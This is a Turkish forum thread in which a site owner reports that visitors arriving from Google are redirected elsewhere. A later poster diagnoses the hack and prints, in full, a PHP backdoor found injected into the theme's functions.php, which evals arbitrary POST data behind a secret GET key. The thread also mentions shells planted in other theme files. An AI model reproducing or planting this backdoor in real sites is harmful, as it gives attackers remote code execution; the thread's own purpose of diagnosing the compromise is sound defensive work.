Forum saldırıya uğramış |
11 Mesajlar | 1.895 Okunma | ||
- Üyelik 04.07.2013
- Yaş/Cinsiyet 44 / E
- Meslek Düşünür
- Konum Ankara
- Ad Soyad M** I**
- Mesajlar 260
- Beğeniler 20 / 37
- Ticaret 2, (%100)
Arkadaşlar sitemi googla da arattım çıkan sonuçlaardan sitemi seçtiğimde başka bir siteye bağlanıyor. Sitemin altında aramalarda site saldırıya uğramış olabilir diye uyarı çıkıyor bu sorunu nasıl düzeltebilirim?
İmzam Yok.
- Üyelik 13.03.2015
- Yaş/Cinsiyet 31 / E
- Meslek PHP Developer , IT Uzmanı
- Konum İzmir
- Ad Soyad H** E**
- Mesajlar 116
- Beğeniler 3 / 10
- Ticaret 1, (%0)
Domainizi ve kelimeyi PM Atarsanız bir inceleyim hocam.
- Üyelik 04.07.2013
- Yaş/Cinsiyet 44 / E
- Meslek Düşünür
- Konum Ankara
- Ad Soyad M** I**
- Mesajlar 260
- Beğeniler 20 / 37
- Ticaret 2, (%100)
pm gönderdim ilginiz için teşekkür ederim
İmzam Yok.
- Üyelik 13.03.2015
- Yaş/Cinsiyet 31 / E
- Meslek PHP Developer , IT Uzmanı
- Konum İzmir
- Ad Soyad H** E**
- Mesajlar 116
- Beğeniler 3 / 10
- Ticaret 1, (%0)
- Üyelik 04.07.2013
- Yaş/Cinsiyet 44 / E
- Meslek Düşünür
- Konum Ankara
- Ad Soyad M** I**
- Mesajlar 260
- Beğeniler 20 / 37
- Ticaret 2, (%100)
İmzam Yok.
- Üyelik 24.08.2014
- Yaş/Cinsiyet 33 / E
- Meslek Front-end Developer
- Konum İstanbul Avrupa
- Ad Soyad S** G**
- Mesajlar 95
- Beğeniler 13 / 31
- Ticaret 0, (%0)
Google webmaster tools'a siteni ekle. Sana adım adım anlatacak nasıl ekleneceğini. Ftp'ye dosya atacaksın google verecek bu dosyayı. Siteni doğruladıktan sonra sorun nerede google gösterecek adresi sana. Geçenlerde başıma geldi, back.asp diye bir dosyada sıkıntı varmış. Sorunu çözüp google'a bildirdim 2 gün içerisinde düzeldi.
- Üyelik 04.07.2013
- Yaş/Cinsiyet 44 / E
- Meslek Düşünür
- Konum Ankara
- Ad Soyad M** I**
- Mesajlar 260
- Beğeniler 20 / 37
- Ticaret 2, (%100)
Google webmaster tools'a siteni ekle. Sana adım adım anlatacak nasıl ekleneceğini. Ftp'ye dosya atacaksın google verecek bu dosyayı. Siteni doğruladıktan sonra sorun nerede google gösterecek adresi sana. Geçenlerde başıma geldi, back.asp diye bir dosyada sıkıntı varmış. Sorunu çözüp google'a bildirdim 2 gün içerisinde düzeldi.
site ekliydi webmaster tools a yeniden mi eklemem gerekiyor*
İmzam Yok.
- Üyelik 24.08.2014
- Yaş/Cinsiyet 33 / E
- Meslek Front-end Developer
- Konum İstanbul Avrupa
- Ad Soyad S** G**
- Mesajlar 95
- Beğeniler 13 / 31
- Ticaret 0, (%0)
Hayır ekli ise giriş yaparak görebilirsiniz.
- Üyelik 04.07.2013
- Yaş/Cinsiyet 44 / E
- Meslek Düşünür
- Konum Ankara
- Ad Soyad M** I**
- Mesajlar 260
- Beğeniler 20 / 37
- Ticaret 2, (%100)
sorgulamayı nereden yapıyoruz girdim ama bulamadım. Sadece bir hata veriyor google bot sitenize erişemiyor diye başka da birşey yok
İmzam Yok.
- Üyelik 14.03.2012
- Yaş/Cinsiyet - / E
- Meslek web hosting
- Konum
- Ad Soyad ** **
- Mesajlar 1
- Beğeniler 0 / 0
- Ticaret 0, (%0)
Arkadaşlar bilen de konuşuyor bilmeyende sorunu ben size detaylı anlatacağım. Konuyu açan kişi benim arkadaşımdır. Sitesini girip incelediğimde şu sorunlara ulaştım.
Eğer sitenize direk erişim yapılıyor, ama googleden aratıldığında girilemiyorsa siteniz hack yemiş ve yönlendirme koduyla yönlendirilmiş demektir.
Yani arkadaşın sitesine direk erişim var ama googleden gelenlere başka bir siteye yönlendirme yapılmış.
Bu yönlendirmeler nasıl yapılır?
1. Yöntem Htacess - kontrol ettim oraya dokunulmamıştır.
2. Yöntem index.php ona da dokunulmamıştır.
3. Yöntem tema dosyaları - Hackleyen kişi tema dosyalarına aşağıdaki kodları girmiş.
31.ocak.2015 tarihinde temadaki aşağıdaki dosyalar değişikliğe uğramış.
404.php içine shell basılmış.
archive.php buna da shell basılmıs.
30.ocak2015 tarihinde functions php ye aşağıdaki kod eklenmiş.
Eğer sitenize direk erişim yapılıyor, ama googleden aratıldığında girilemiyorsa siteniz hack yemiş ve yönlendirme koduyla yönlendirilmiş demektir.
Yani arkadaşın sitesine direk erişim var ama googleden gelenlere başka bir siteye yönlendirme yapılmış.
Bu yönlendirmeler nasıl yapılır?
1. Yöntem Htacess - kontrol ettim oraya dokunulmamıştır.
2. Yöntem index.php ona da dokunulmamıştır.
3. Yöntem tema dosyaları - Hackleyen kişi tema dosyalarına aşağıdaki kodları girmiş.
31.ocak.2015 tarihinde temadaki aşağıdaki dosyalar değişikliğe uğramış.
404.php içine shell basılmış.
archive.php buna da shell basılmıs.
30.ocak2015 tarihinde functions php ye aşağıdaki kod eklenmiş.
function _g3t($str){
$val = !empty($_GET[$str]) ? $_GET[$str] : null;
return $val;
}
if(_g3t('eeK')=='f')
{
@eval($_POST['NWZAF']);
exit;
}
if(_g3t('eeK')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}
//dsd6sc378axvg
?>
Tahminim adamlar güzel bi if else döngüsü kurarak siteyi site sahibi anlamadan yönlendirme yaparak piç etmişler.
Saçma sapan alakasız mesajlarla yardımcı olayım derken kimsenin kafasını bulandırmayınız.
Yok efendim Sunucu IP si spam olmuş bilmemne tüm siteler spama düşecekmiş falan filan.
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)